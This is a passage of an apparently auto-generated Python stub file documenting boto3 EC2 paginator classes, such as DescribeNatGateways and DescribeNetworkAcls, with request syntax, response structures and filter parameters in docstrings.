                    Constraints: Tag values are case-sensitive and accept a maximum of 255 Unicode characters.
        :type DryRun: boolean
        :param DryRun:
          Checks whether you have the required permissions for the action, without actually making the request, and provides an error response. If you have the required permissions, the error response is ``DryRunOperation`` . Otherwise, it is ``UnauthorizedOperation`` .
        :type LaunchTemplateIds: list
        :param LaunchTemplateIds:
          One or more launch template IDs.
          - *(string) --*
        :type LaunchTemplateNames: list
        :param LaunchTemplateNames:
          One or more launch template names.
          - *(string) --*
        :type Filters: list
        :param Filters:
          One or more filters.
          * ``create-time`` - The time the launch template was created.
          * ``launch-template-name`` - The name of the launch template.
          * ``tag`` :<key> - The key/value combination of a tag assigned to the resource. Use the tag key in the filter name and the tag value as the filter value. For example, to find all resources that have a tag with the key ``Owner`` and the value ``TeamA`` , specify ``tag:Owner`` for the filter name and ``TeamA`` for the filter value.
          * ``tag-key`` - The key of a tag assigned to the resource. Use this filter to find all resources assigned a tag with a specific key, regardless of the tag value.
          - *(dict) --*
            A filter name and value pair that is used to return a more specific list of results from a describe operation. Filters can be used to match a set of resources by specific criteria, such as tags, attributes, or IDs. The filters supported by a describe operation are documented with the describe operation. For example:
            * DescribeAvailabilityZones
            * DescribeImages
            * DescribeInstances
            * DescribeKeyPairs
            * DescribeSecurityGroups
            * DescribeSnapshots
            * DescribeSubnets
            * DescribeTags
            * DescribeVolumes
            * DescribeVpcs
            - **Name** *(string) --*
              The name of the filter. Filter names are case-sensitive.
            - **Values** *(list) --*
              The filter values. Filter values are case-sensitive.
              - *(string) --*
        :type PaginationConfig: dict
        :param PaginationConfig:
          A dictionary that provides parameters to control pagination.
          - **MaxItems** *(integer) --*
            The total number of items to return. If the total number of items available is more than the value specified in max-items then a ``NextToken`` will be provided in the output that you can use to resume pagination.
          - **PageSize** *(integer) --*
            The size of each page.
          - **StartingToken** *(string) --*
            A token to specify where to start paginating. This is the ``NextToken`` from a previous response.
        :rtype: dict
        :returns:
        """
        pass
class DescribeMovingAddresses(Paginator):
    # Documentation/typing stub: ``paginate`` carries the full AWS
    # request/response reference for DescribeMovingAddresses and a ``pass``
    # body — presumably the real pagination logic is supplied dynamically
    # by botocore at runtime (TODO confirm against the generator).
    def paginate(self, Filters: List = None, DryRun: bool = None, PublicIps: List = None, PaginationConfig: Dict = None) -> Dict:
        """
        Creates an iterator that will paginate through responses from :py:meth:`EC2.Client.describe_moving_addresses`.
        See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/ec2-2016-11-15/DescribeMovingAddresses>`_
        **Request Syntax**
        ::
          response_iterator = paginator.paginate(
              Filters=[
                  {
                      'Name': 'string',
                      'Values': [
                          'string',
                      ]
                  },
              ],
              DryRun=True|False,
              PublicIps=[
                  'string',
              ],
              PaginationConfig={
                  'MaxItems': 123,
                  'PageSize': 123,
                  'StartingToken': 'string'
              }
          )
        **Response Syntax**
        ::
          {
              'MovingAddressStatuses': [
                  {
                      'MoveStatus': 'movingToVpc'|'restoringToClassic',
                      'PublicIp': 'string'
                  },
              ],
          }
        **Response Structure**
        - *(dict) --*
          - **MovingAddressStatuses** *(list) --*
            The status for each Elastic IP address.
            - *(dict) --*
              Describes the status of a moving Elastic IP address.
              - **MoveStatus** *(string) --*
                The status of the Elastic IP address that's being moved to the EC2-VPC platform, or restored to the EC2-Classic platform.
              - **PublicIp** *(string) --*
                The Elastic IP address.
        :type Filters: list
        :param Filters:
          One or more filters.
          * ``moving-status`` - The status of the Elastic IP address (``MovingToVpc`` | ``RestoringToClassic`` ).
          - *(dict) --*
            A filter name and value pair that is used to return a more specific list of results from a describe operation. Filters can be used to match a set of resources by specific criteria, such as tags, attributes, or IDs. The filters supported by a describe operation are documented with the describe operation. For example:
            * DescribeAvailabilityZones
            * DescribeImages
            * DescribeInstances
            * DescribeKeyPairs
            * DescribeSecurityGroups
            * DescribeSnapshots
            * DescribeSubnets
            * DescribeTags
            * DescribeVolumes
            * DescribeVpcs
            - **Name** *(string) --*
              The name of the filter. Filter names are case-sensitive.
            - **Values** *(list) --*
              The filter values. Filter values are case-sensitive.
              - *(string) --*
        :type DryRun: boolean
        :param DryRun:
          Checks whether you have the required permissions for the action, without actually making the request, and provides an error response. If you have the required permissions, the error response is ``DryRunOperation`` . Otherwise, it is ``UnauthorizedOperation`` .
        :type PublicIps: list
        :param PublicIps:
          One or more Elastic IP addresses.
          - *(string) --*
        :type PaginationConfig: dict
        :param PaginationConfig:
          A dictionary that provides parameters to control pagination.
          - **MaxItems** *(integer) --*
            The total number of items to return. If the total number of items available is more than the value specified in max-items then a ``NextToken`` will be provided in the output that you can use to resume pagination.
          - **PageSize** *(integer) --*
            The size of each page.
          - **StartingToken** *(string) --*
            A token to specify where to start paginating. This is the ``NextToken`` from a previous response.
        :rtype: dict
        :returns:
        """
        pass
class DescribeNatGateways(Paginator):
    # Documentation/typing stub: ``paginate`` carries the full AWS
    # request/response reference for DescribeNatGateways and a ``pass``
    # body — presumably the real pagination logic is supplied dynamically
    # by botocore at runtime (TODO confirm against the generator).
    def paginate(self, Filters: List = None, NatGatewayIds: List = None, PaginationConfig: Dict = None) -> Dict:
        """
        Creates an iterator that will paginate through responses from :py:meth:`EC2.Client.describe_nat_gateways`.
        See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/ec2-2016-11-15/DescribeNatGateways>`_
        **Request Syntax**
        ::
          response_iterator = paginator.paginate(
              Filters=[
                  {
                      'Name': 'string',
                      'Values': [
                          'string',
                      ]
                  },
              ],
              NatGatewayIds=[
                  'string',
              ],
              PaginationConfig={
                  'MaxItems': 123,
                  'PageSize': 123,
                  'StartingToken': 'string'
              }
          )
        **Response Syntax**
        ::
          {
              'NatGateways': [
                  {
                      'CreateTime': datetime(2015, 1, 1),
                      'DeleteTime': datetime(2015, 1, 1),
                      'FailureCode': 'string',
                      'FailureMessage': 'string',
                      'NatGatewayAddresses': [
                          {
                              'AllocationId': 'string',
                              'NetworkInterfaceId': 'string',
                              'PrivateIp': 'string',
                              'PublicIp': 'string'
                          },
                      ],
                      'NatGatewayId': 'string',
                      'ProvisionedBandwidth': {
                          'ProvisionTime': datetime(2015, 1, 1),
                          'Provisioned': 'string',
                          'RequestTime': datetime(2015, 1, 1),
                          'Requested': 'string',
                          'Status': 'string'
                      },
                      'State': 'pending'|'failed'|'available'|'deleting'|'deleted',
                      'SubnetId': 'string',
                      'VpcId': 'string',
                      'Tags': [
                          {
                              'Key': 'string',
                              'Value': 'string'
                          },
                      ]
                  },
              ],
          }
        **Response Structure**
        - *(dict) --*
          - **NatGateways** *(list) --*
            Information about the NAT gateways.
            - *(dict) --*
              Describes a NAT gateway.
              - **CreateTime** *(datetime) --*
                The date and time the NAT gateway was created.
              - **DeleteTime** *(datetime) --*
                The date and time the NAT gateway was deleted, if applicable.
              - **FailureCode** *(string) --*
                If the NAT gateway could not be created, specifies the error code for the failure. (``InsufficientFreeAddressesInSubnet`` | ``Gateway.NotAttached`` | ``InvalidAllocationID.NotFound`` | ``Resource.AlreadyAssociated`` | ``InternalError`` | ``InvalidSubnetID.NotFound`` )
              - **FailureMessage** *(string) --*
                If the NAT gateway could not be created, specifies the error message for the failure, that corresponds to the error code.
                * For InsufficientFreeAddressesInSubnet: "Subnet has insufficient free addresses to create this NAT gateway"
                * For Gateway.NotAttached: "Network vpc-xxxxxxxx has no Internet gateway attached"
                * For InvalidAllocationID.NotFound: "Elastic IP address eipalloc-xxxxxxxx could not be associated with this NAT gateway"
                * For Resource.AlreadyAssociated: "Elastic IP address eipalloc-xxxxxxxx is already associated"
                * For InternalError: "Network interface eni-xxxxxxxx, created and used internally by this NAT gateway is in an invalid state. Please try again."
                * For InvalidSubnetID.NotFound: "The specified subnet subnet-xxxxxxxx does not exist or could not be found."
              - **NatGatewayAddresses** *(list) --*
                Information about the IP addresses and network interface associated with the NAT gateway.
                - *(dict) --*
                  Describes the IP addresses and network interface associated with a NAT gateway.
                  - **AllocationId** *(string) --*
                    The allocation ID of the Elastic IP address that's associated with the NAT gateway.
                  - **NetworkInterfaceId** *(string) --*
                    The ID of the network interface associated with the NAT gateway.
                  - **PrivateIp** *(string) --*
                    The private IP address associated with the Elastic IP address.
                  - **PublicIp** *(string) --*
                    The Elastic IP address associated with the NAT gateway.
              - **NatGatewayId** *(string) --*
                The ID of the NAT gateway.
              - **ProvisionedBandwidth** *(dict) --*
                Reserved. If you need to sustain traffic greater than the `documented limits <https://docs.aws.amazon.com/AmazonVPC/latest/UserGuide/vpc-nat-gateway.html>`__ , contact us through the `Support Center <https://console.aws.amazon.com/support/home?>`__ .
                - **ProvisionTime** *(datetime) --*
                  Reserved. If you need to sustain traffic greater than the `documented limits <https://docs.aws.amazon.com/AmazonVPC/latest/UserGuide/vpc-nat-gateway.html>`__ , contact us through the `Support Center <https://console.aws.amazon.com/support/home?>`__ .
                - **Provisioned** *(string) --*
                  Reserved. If you need to sustain traffic greater than the `documented limits <https://docs.aws.amazon.com/AmazonVPC/latest/UserGuide/vpc-nat-gateway.html>`__ , contact us through the `Support Center <https://console.aws.amazon.com/support/home?>`__ .
                - **RequestTime** *(datetime) --*
                  Reserved. If you need to sustain traffic greater than the `documented limits <https://docs.aws.amazon.com/AmazonVPC/latest/UserGuide/vpc-nat-gateway.html>`__ , contact us through the `Support Center <https://console.aws.amazon.com/support/home?>`__ .
                - **Requested** *(string) --*
                  Reserved. If you need to sustain traffic greater than the `documented limits <https://docs.aws.amazon.com/AmazonVPC/latest/UserGuide/vpc-nat-gateway.html>`__ , contact us through the `Support Center <https://console.aws.amazon.com/support/home?>`__ .
                - **Status** *(string) --*
                  Reserved. If you need to sustain traffic greater than the `documented limits <https://docs.aws.amazon.com/AmazonVPC/latest/UserGuide/vpc-nat-gateway.html>`__ , contact us through the `Support Center <https://console.aws.amazon.com/support/home?>`__ .
              - **State** *(string) --*
                The state of the NAT gateway.
                * ``pending`` : The NAT gateway is being created and is not ready to process traffic.
                * ``failed`` : The NAT gateway could not be created. Check the ``failureCode`` and ``failureMessage`` fields for the reason.
                * ``available`` : The NAT gateway is able to process traffic. This status remains until you delete the NAT gateway, and does not indicate the health of the NAT gateway.
                * ``deleting`` : The NAT gateway is in the process of being terminated and may still be processing traffic.
                * ``deleted`` : The NAT gateway has been terminated and is no longer processing traffic.
              - **SubnetId** *(string) --*
                The ID of the subnet in which the NAT gateway is located.
              - **VpcId** *(string) --*
                The ID of the VPC in which the NAT gateway is located.
              - **Tags** *(list) --*
                The tags for the NAT gateway.
                - *(dict) --*
                  Describes a tag.
                  - **Key** *(string) --*
                    The key of the tag.
                    Constraints: Tag keys are case-sensitive and accept a maximum of 127 Unicode characters. May not begin with ``aws:`` .
                  - **Value** *(string) --*
                    The value of the tag.
                    Constraints: Tag values are case-sensitive and accept a maximum of 255 Unicode characters.
        :type Filters: list
        :param Filters:
          One or more filters.
          * ``nat-gateway-id`` - The ID of the NAT gateway.
          * ``state`` - The state of the NAT gateway (``pending`` | ``failed`` | ``available`` | ``deleting`` | ``deleted`` ).
          * ``subnet-id`` - The ID of the subnet in which the NAT gateway resides.
          * ``tag`` :<key> - The key/value combination of a tag assigned to the resource. Use the tag key in the filter name and the tag value as the filter value. For example, to find all resources that have a tag with the key ``Owner`` and the value ``TeamA`` , specify ``tag:Owner`` for the filter name and ``TeamA`` for the filter value.
          * ``tag-key`` - The key of a tag assigned to the resource. Use this filter to find all resources assigned a tag with a specific key, regardless of the tag value.
          * ``vpc-id`` - The ID of the VPC in which the NAT gateway resides.
          - *(dict) --*
            A filter name and value pair that is used to return a more specific list of results from a describe operation. Filters can be used to match a set of resources by specific criteria, such as tags, attributes, or IDs. The filters supported by a describe operation are documented with the describe operation. For example:
            * DescribeAvailabilityZones
            * DescribeImages
            * DescribeInstances
            * DescribeKeyPairs
            * DescribeSecurityGroups
            * DescribeSnapshots
            * DescribeSubnets
            * DescribeTags
            * DescribeVolumes
            * DescribeVpcs
            - **Name** *(string) --*
              The name of the filter. Filter names are case-sensitive.
            - **Values** *(list) --*
              The filter values. Filter values are case-sensitive.
              - *(string) --*
        :type NatGatewayIds: list
        :param NatGatewayIds:
          One or more NAT gateway IDs.
          - *(string) --*
        :type PaginationConfig: dict
        :param PaginationConfig:
          A dictionary that provides parameters to control pagination.
          - **MaxItems** *(integer) --*
            The total number of items to return. If the total number of items available is more than the value specified in max-items then a ``NextToken`` will be provided in the output that you can use to resume pagination.
          - **PageSize** *(integer) --*
            The size of each page.
          - **StartingToken** *(string) --*
            A token to specify where to start paginating. This is the ``NextToken`` from a previous response.
        :rtype: dict
        :returns:
        """
        pass
class DescribeNetworkAcls(Paginator):
    # Documentation/typing stub: ``paginate`` carries the full AWS
    # request/response reference for DescribeNetworkAcls and a ``pass``
    # body — presumably the real pagination logic is supplied dynamically
    # by botocore at runtime (TODO confirm against the generator).
    def paginate(self, Filters: List = None, DryRun: bool = None, NetworkAclIds: List = None, PaginationConfig: Dict = None) -> Dict:
        """
        Creates an iterator that will paginate through responses from :py:meth:`EC2.Client.describe_network_acls`.
        See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/ec2-2016-11-15/DescribeNetworkAcls>`_
        **Request Syntax**
        ::
          response_iterator = paginator.paginate(
              Filters=[
                  {
                      'Name': 'string',
                      'Values': [
                          'string',
                      ]
                  },
              ],
              DryRun=True|False,
              NetworkAclIds=[
                  'string',
              ],
              PaginationConfig={
                  'MaxItems': 123,
                  'PageSize': 123,
                  'StartingToken': 'string'
              }
          )
        **Response Syntax**
        ::
          {
              'NetworkAcls': [
                  {
                      'Associations': [
                          {
                              'NetworkAclAssociationId': 'string',
                              'NetworkAclId': 'string',
                              'SubnetId': 'string'
                          },
                      ],
                      'Entries': [
                          {
                              'CidrBlock': 'string',
                              'Egress': True|False,
                              'IcmpTypeCode': {
                                  'Code': 123,
                                  'Type': 123
                              },
                              'Ipv6CidrBlock': 'string',
                              'PortRange': {
                                  'From': 123,
                                  'To': 123
                              },
                              'Protocol': 'string',
                              'RuleAction': 'allow'|'deny',
                              'RuleNumber': 123
                          },
                      ],
                      'IsDefault': True|False,
                      'NetworkAclId': 'string',
                      'Tags': [
                          {
                              'Key': 'string',
                              'Value': 'string'
                          },
                      ],
                      'VpcId': 'string',
                      'OwnerId': 'string'
                  },
              ],
          }
        **Response Structure**
        - *(dict) --*
          - **NetworkAcls** *(list) --*
            Information about one or more network ACLs.
            - *(dict) --*
              Describes a network ACL.
              - **Associations** *(list) --*
                Any associations between the network ACL and one or more subnets.
                - *(dict) --*
                  Describes an association between a network ACL and a subnet.
                  - **NetworkAclAssociationId** *(string) --*
                    The ID of the association between a network ACL and a subnet.
                  - **NetworkAclId** *(string) --*
                    The ID of the network ACL.
                  - **SubnetId** *(string) --*
                    The ID of the subnet.
              - **Entries** *(list) --*
                One or more entries (rules) in the network ACL.
                - *(dict) --*
                  Describes an entry in a network ACL.
                  - **CidrBlock** *(string) --*
                    The IPv4 network range to allow or deny, in CIDR notation.
                  - **Egress** *(boolean) --*
                    Indicates whether the rule is an egress rule (applied to traffic leaving the subnet).
                  - **IcmpTypeCode** *(dict) --*
                    ICMP protocol: The ICMP type and code.
                    - **Code** *(integer) --*
                      The ICMP code. A value of -1 means all codes for the specified ICMP type.
                    - **Type** *(integer) --*
                      The ICMP type. A value of -1 means all types.
                  - **Ipv6CidrBlock** *(string) --*
                    The IPv6 network range to allow or deny, in CIDR notation.
                  - **PortRange** *(dict) --*
                    TCP or UDP protocols: The range of ports the rule applies to.
                    - **From** *(integer) --*
                      The first port in the range.
                    - **To** *(integer) --*
                      The last port in the range.
                  - **Protocol** *(string) --*
                    The protocol number. A value of "-1" means all protocols.
                  - **RuleAction** *(string) --*
                    Indicates whether to allow or deny the traffic that matches the rule.
                  - **RuleNumber** *(integer) --*
                    The rule number for the entry. ACL entries are processed in ascending order by rule number.
              - **IsDefault** *(boolean) --*
                Indicates whether this is the default network ACL for the VPC.
              - **NetworkAclId** *(string) --*
                The ID of the network ACL.
              - **Tags** *(list) --*
                Any tags assigned to the network ACL.
                - *(dict) --*
                  Describes a tag.
                  - **Key** *(string) --*
                    The key of the tag.
                    Constraints: Tag keys are case-sensitive and accept a maximum of 127 Unicode characters. May not begin with ``aws:`` .
                  - **Value** *(string) --*
                    The value of the tag.
                    Constraints: Tag values are case-sensitive and accept a maximum of 255 Unicode characters.
              - **VpcId** *(string) --*
                The ID of the VPC for the network ACL.
              - **OwnerId** *(string) --*
                The ID of the AWS account that owns the network ACL.
        :type Filters: list
        :param Filters:
          One or more filters.
          * ``association.association-id`` - The ID of an association ID for the ACL.
          * ``association.network-acl-id`` - The ID of the network ACL involved in the association.
          * ``association.subnet-id`` - The ID of the subnet involved in the association.
          * ``default`` - Indicates whether the ACL is the default network ACL for the VPC.
          * ``entry.cidr`` - The IPv4 CIDR range specified in the entry.
          * ``entry.icmp.code`` - The ICMP code specified in the entry, if any.
          * ``entry.icmp.type`` - The ICMP type specified in the entry, if any.
          * ``entry.ipv6-cidr`` - The IPv6 CIDR range specified in the entry.
          * ``entry.port-range.from`` - The start of the port range specified in the entry.
          * ``entry.port-range.to`` - The end of the port range specified in the entry.
          * ``entry.protocol`` - The protocol specified in the entry (``tcp`` | ``udp`` | ``icmp`` or a protocol number).
          * ``entry.rule-action`` - Allows or denies the matching traffic (``allow`` | ``deny`` ).
          * ``entry.rule-number`` - The number of an entry (in other words, rule) in the set of ACL entries.
          * ``network-acl-id`` - The ID of the network ACL.
          * ``owner-id`` - The ID of the AWS account that owns the network ACL.
          * ``tag`` :<key> - The key/value combination of a tag assigned to the resource. Use the tag key in the filter name and the tag value as the filter value. For example, to find all resources that have a tag with the key ``Owner`` and the value ``TeamA`` , specify ``tag:Owner`` for the filter name and ``TeamA`` for the filter value.
          * ``tag-key`` - The key of a tag assigned to the resource. Use this filter to find all resources assigned a tag with a specific key, regardless of the tag value.
          * ``vpc-id`` - The ID of the VPC for the network ACL.
          - *(dict) --*
            A filter name and value pair that is used to return a more specific list of results from a describe operation. Filters can be used to match a set of resources by specific criteria, such as tags, attributes, or IDs. The filters supported by a describe operation are documented with the describe operation. For example:
            * DescribeAvailabilityZones
            * DescribeImages
            * DescribeInstances
            * DescribeKeyPairs
            * DescribeSecurityGroups
            * DescribeSnapshots
            * DescribeSubnets
            * DescribeTags
            * DescribeVolumes
            * DescribeVpcs
            - **Name** *(string) --*
              The name of the filter. Filter names are case-sensitive.
            - **Values** *(list) --*
              The filter values. Filter values are case-sensitive.
              - *(string) --*
        :type DryRun: boolean
        :param DryRun:
          Checks whether you have the required permissions for the action, without actually making the request, and provides an error response. If you have the required permissions, the error response is ``DryRunOperation`` . Otherwise, it is ``UnauthorizedOperation`` .
        :type NetworkAclIds: list
        :param NetworkAclIds:
          One or more network ACL IDs.
          Default: Describes all your network ACLs.
          - *(string) --*
        :type PaginationConfig: dict
        :param PaginationConfig:
          A dictionary that provides parameters to control pagination.
          - **MaxItems** *(integer) --*
            The total number of items to return. If the total number of items available is more than the value specified in max-items then a ``NextToken`` will be provided in the output that you can use to resume pagination.
          - **PageSize** *(integer) --*
            The size of each page.
          - **StartingToken** *(string) --*
            A token to specify where to start paginating. This is the ``NextToken`` from a previous response.
        :rtype: dict
        :returns:
        """
        pass
class DescribeNetworkInterfacePermissions(Paginator):
    def paginate(self, NetworkInterfacePermissionIds: List = None, Filters: List = None, PaginationConfig: Dict = None) -> Dict:
        """
        Create an iterator that paginates through responses from
        :py:meth:`EC2.Client.describe_network_interface_permissions`.

        See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/ec2-2016-11-15/DescribeNetworkInterfacePermissions>`_

        :type NetworkInterfacePermissionIds: list
        :param NetworkInterfacePermissionIds:
          One or more network interface permission IDs (strings).
        :type Filters: list
        :param Filters:
          One or more filters, each a dict with a case-sensitive ``Name``
          (string) and ``Values`` (list of strings). Supported filter names:
          * ``network-interface-permission.network-interface-permission-id`` - The ID of the permission.
          * ``network-interface-permission.network-interface-id`` - The ID of the network interface.
          * ``network-interface-permission.aws-account-id`` - The AWS account ID.
          * ``network-interface-permission.aws-service`` - The AWS service.
          * ``network-interface-permission.permission`` - The type of permission (``INSTANCE-ATTACH`` | ``EIP-ASSOCIATE``).
        :type PaginationConfig: dict
        :param PaginationConfig:
          Pagination controls: ``MaxItems`` (integer, total number of items to
          return; a ``NextToken`` is provided in the output when more items are
          available), ``PageSize`` (integer, size of each page) and
          ``StartingToken`` (string, the ``NextToken`` from a previous
          response).
        :rtype: dict
        :returns:
          A dict containing a ``NetworkInterfacePermissions`` list. Each entry
          describes one permission: ``NetworkInterfacePermissionId`` (string),
          ``NetworkInterfaceId`` (string), ``AwsAccountId`` (string),
          ``AwsService`` (string), ``Permission``
          (``'INSTANCE-ATTACH'`` | ``'EIP-ASSOCIATE'``) and a
          ``PermissionState`` dict with ``State``
          (``'pending'`` | ``'granted'`` | ``'revoking'`` | ``'revoked'``) and
          ``StatusMessage`` (string).
        """
        pass
class DescribeNetworkInterfaces(Paginator):
    def paginate(self, Filters: List = None, DryRun: bool = None, NetworkInterfaceIds: List = None, PaginationConfig: Dict = None) -> Dict:
        """
        Create an iterator that paginates through responses from
        :py:meth:`EC2.Client.describe_network_interfaces`.

        See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/ec2-2016-11-15/DescribeNetworkInterfaces>`_

        :type Filters: list
        :param Filters:
          One or more filters, each a dict with a case-sensitive ``Name``
          (string) and ``Values`` (list of strings). Supported filter names:
          * ``addresses.private-ip-address`` - The private IPv4 addresses associated with the network interface.
          * ``addresses.primary`` - Whether the private IPv4 address is the primary IP address associated with the network interface.
          * ``addresses.association.public-ip`` - The association ID returned when the network interface was associated with the Elastic IP address (IPv4).
          * ``addresses.association.owner-id`` - The owner ID of the addresses associated with the network interface.
          * ``association.association-id`` - The association ID returned when the network interface was associated with an IPv4 address.
          * ``association.allocation-id`` - The allocation ID returned when you allocated the Elastic IP address (IPv4) for your network interface.
          * ``association.ip-owner-id`` - The owner of the Elastic IP address (IPv4) associated with the network interface.
          * ``association.public-ip`` - The address of the Elastic IP address (IPv4) bound to the network interface.
          * ``association.public-dns-name`` - The public DNS name for the network interface (IPv4).
          * ``attachment.attachment-id`` - The ID of the interface attachment.
          * ``attachment.attach.time`` - The time that the network interface was attached to an instance.
          * ``attachment.delete-on-termination`` - Indicates whether the attachment is deleted when an instance is terminated.
          * ``attachment.device-index`` - The device index to which the network interface is attached.
          * ``attachment.instance-id`` - The ID of the instance to which the network interface is attached.
          * ``attachment.instance-owner-id`` - The owner ID of the instance to which the network interface is attached.
          * ``attachment.nat-gateway-id`` - The ID of the NAT gateway to which the network interface is attached.
          * ``attachment.status`` - The status of the attachment (``attaching`` | ``attached`` | ``detaching`` | ``detached``).
          * ``availability-zone`` - The Availability Zone of the network interface.
          * ``description`` - The description of the network interface.
          * ``group-id`` - The ID of a security group associated with the network interface.
          * ``group-name`` - The name of a security group associated with the network interface.
          * ``ipv6-addresses.ipv6-address`` - An IPv6 address associated with the network interface.
          * ``mac-address`` - The MAC address of the network interface.
          * ``network-interface-id`` - The ID of the network interface.
          * ``owner-id`` - The AWS account ID of the network interface owner.
          * ``private-ip-address`` - The private IPv4 address or addresses of the network interface.
          * ``private-dns-name`` - The private DNS name of the network interface (IPv4).
          * ``requester-id`` - The ID of the entity that launched the instance on your behalf (for example, AWS Management Console, Auto Scaling, and so on).
          * ``requester-managed`` - Indicates whether the network interface is being managed by an AWS service (for example, AWS Management Console, Auto Scaling, and so on).
          * ``source-dest-check`` - Indicates whether the network interface performs source/destination checking. A value of ``true`` means checking is enabled, and ``false`` means checking is disabled. The value must be ``false`` for the network interface to perform network address translation (NAT) in your VPC.
          * ``status`` - The status of the network interface. If the network interface is not attached to an instance, the status is ``available``; if a network interface is attached to an instance the status is ``in-use``.
          * ``subnet-id`` - The ID of the subnet for the network interface.
          * ``tag``:<key> - The key/value combination of a tag assigned to the resource. Use the tag key in the filter name and the tag value as the filter value.
          * ``tag-key`` - The key of a tag assigned to the resource, regardless of the tag value.
          * ``vpc-id`` - The ID of the VPC for the network interface.
        :type DryRun: boolean
        :param DryRun:
          Checks whether you have the required permissions for the action
          without making the request. With the required permissions the error
          response is ``DryRunOperation``; otherwise it is
          ``UnauthorizedOperation``.
        :type NetworkInterfaceIds: list
        :param NetworkInterfaceIds:
          One or more network interface IDs (strings). Default: describes all
          your network interfaces.
        :type PaginationConfig: dict
        :param PaginationConfig:
          Pagination controls: ``MaxItems`` (integer, total number of items to
          return; a ``NextToken`` is provided in the output when more items are
          available), ``PageSize`` (integer, size of each page) and
          ``StartingToken`` (string, the ``NextToken`` from a previous
          response).
        :rtype: dict
        :returns:
          A dict containing a ``NetworkInterfaces`` list. Each entry describes
          one network interface:
          * ``Association`` *(dict)* - Elastic IP (IPv4) association info: ``AllocationId``, ``AssociationId``, ``IpOwnerId``, ``PublicDnsName``, ``PublicIp``.
          * ``Attachment`` *(dict)* - ``AttachTime`` (datetime), ``AttachmentId``, ``DeleteOnTermination`` (boolean), ``DeviceIndex`` (integer), ``InstanceId``, ``InstanceOwnerId`` and ``Status`` (``'attaching'`` | ``'attached'`` | ``'detaching'`` | ``'detached'``).
          * ``AvailabilityZone``, ``Description`` *(strings)*.
          * ``Groups`` *(list of dicts)* - security groups, each with ``GroupName`` and ``GroupId``.
          * ``InterfaceType`` - ``'interface'`` | ``'natGateway'`` | ``'efa'``.
          * ``Ipv6Addresses`` *(list of dicts)* - each with ``Ipv6Address``.
          * ``MacAddress``, ``NetworkInterfaceId``, ``OwnerId``, ``PrivateDnsName``, ``PrivateIpAddress`` *(strings)*.
          * ``PrivateIpAddresses`` *(list of dicts)* - each with its own ``Association`` dict, ``Primary`` (boolean), ``PrivateDnsName`` and ``PrivateIpAddress``.
          * ``RequesterId`` *(string)*, ``RequesterManaged`` *(boolean)*, ``SourceDestCheck`` *(boolean)*.
          * ``Status`` - ``'available'`` | ``'associated'`` | ``'attaching'`` | ``'in-use'`` | ``'detaching'``.
          * ``SubnetId`` *(string)*.
          * ``TagSet`` *(list of dicts)* - each with ``Key`` (up to 127 Unicode characters, may not begin with ``aws:``) and ``Value`` (up to 255 Unicode characters); tag keys and values are case-sensitive.
          * ``VpcId`` *(string)*.
        """
        pass
class DescribePrefixLists(Paginator):
    def paginate(self, DryRun: bool = None, Filters: List = None, PrefixListIds: List = None, PaginationConfig: Dict = None) -> Dict:
        """
        Create an iterator that paginates through responses from
        :py:meth:`EC2.Client.describe_prefix_lists`.

        See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/ec2-2016-11-15/DescribePrefixLists>`_

        :type DryRun: boolean
        :param DryRun:
          Checks whether you have the required permissions for the action
          without making the request. With the required permissions the error
          response is ``DryRunOperation``; otherwise it is
          ``UnauthorizedOperation``.
        :type Filters: list
        :param Filters:
          One or more filters, each a dict with a case-sensitive ``Name``
          (string) and ``Values`` (list of strings). Supported filter names:
          * ``prefix-list-id`` : The ID of a prefix list.
          * ``prefix-list-name`` : The name of a prefix list.
        :type PrefixListIds: list
        :param PrefixListIds:
          One or more prefix list IDs (strings).
        :type PaginationConfig: dict
        :param PaginationConfig:
          Pagination controls: ``MaxItems`` (integer, total number of items to
          return; a ``NextToken`` is provided in the output when more items are
          available), ``PageSize`` (integer, size of each page) and
          ``StartingToken`` (string, the ``NextToken`` from a previous
          response).
        :rtype: dict
        :returns:
          A dict containing a ``PrefixLists`` list of all available prefix
          lists. Each entry describes prefixes for AWS services: ``Cidrs``
          (list of strings, the IP address range of the AWS service),
          ``PrefixListId`` (string, the ID of the prefix) and
          ``PrefixListName`` (string, the name of the prefix).
        """
        pass
class DescribePrincipalIdFormat(Paginator):
    def paginate(self, DryRun: bool = None, Resources: List = None, PaginationConfig: Dict = None) -> Dict:
        """
        Create an iterator that paginates through responses from
        :py:meth:`EC2.Client.describe_principal_id_format`.

        See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/ec2-2016-11-15/DescribePrincipalIdFormat>`_

        :type DryRun: boolean
        :param DryRun:
          Checks whether you have the required permissions for the action
          without making the request. With the required permissions the error
          response is ``DryRunOperation``; otherwise it is
          ``UnauthorizedOperation``.
        :type Resources: list
        :param Resources:
          The type of resource: ``bundle`` | ``conversion-task`` |
          ``customer-gateway`` | ``dhcp-options`` | ``elastic-ip-allocation`` |
          ``elastic-ip-association`` | ``export-task`` | ``flow-log`` |
          ``image`` | ``import-task`` | ``instance`` | ``internet-gateway`` |
          ``network-acl`` | ``network-acl-association`` |
          ``network-interface`` | ``network-interface-attachment`` |
          ``prefix-list`` | ``reservation`` | ``route-table`` |
          ``route-table-association`` | ``security-group`` | ``snapshot`` |
          ``subnet`` | ``subnet-cidr-block-association`` | ``volume`` |
          ``vpc`` | ``vpc-cidr-block-association`` | ``vpc-endpoint`` |
          ``vpc-peering-connection`` | ``vpn-connection`` | ``vpn-gateway``
        :type PaginationConfig: dict
        :param PaginationConfig:
          Pagination controls: ``MaxItems`` (integer, total number of items to
          return; a ``NextToken`` is provided in the output when more items are
          available), ``PageSize`` (integer, size of each page) and
          ``StartingToken`` (string, the ``NextToken`` from a previous
          response).
        :rtype: dict
        :returns:
          A dict containing a ``Principals`` list with the ID format settings
          for each ARN. Each entry has ``Arn`` (string) and ``Statuses``, a
          list of dicts describing the ID format per resource: ``Deadline``
          (datetime, the date in UTC at which you are permanently switched
          over to using longer IDs; not returned when no deadline is yet
          available for the resource type), ``Resource`` (string, the type of
          resource) and ``UseLongIds`` (boolean, whether longer 17-character
          IDs are enabled for the resource).
        """
        pass
class DescribePublicIpv4Pools(Paginator):
    def paginate(self, PoolIds: List = None, PaginationConfig: Dict = None) -> Dict:
        """
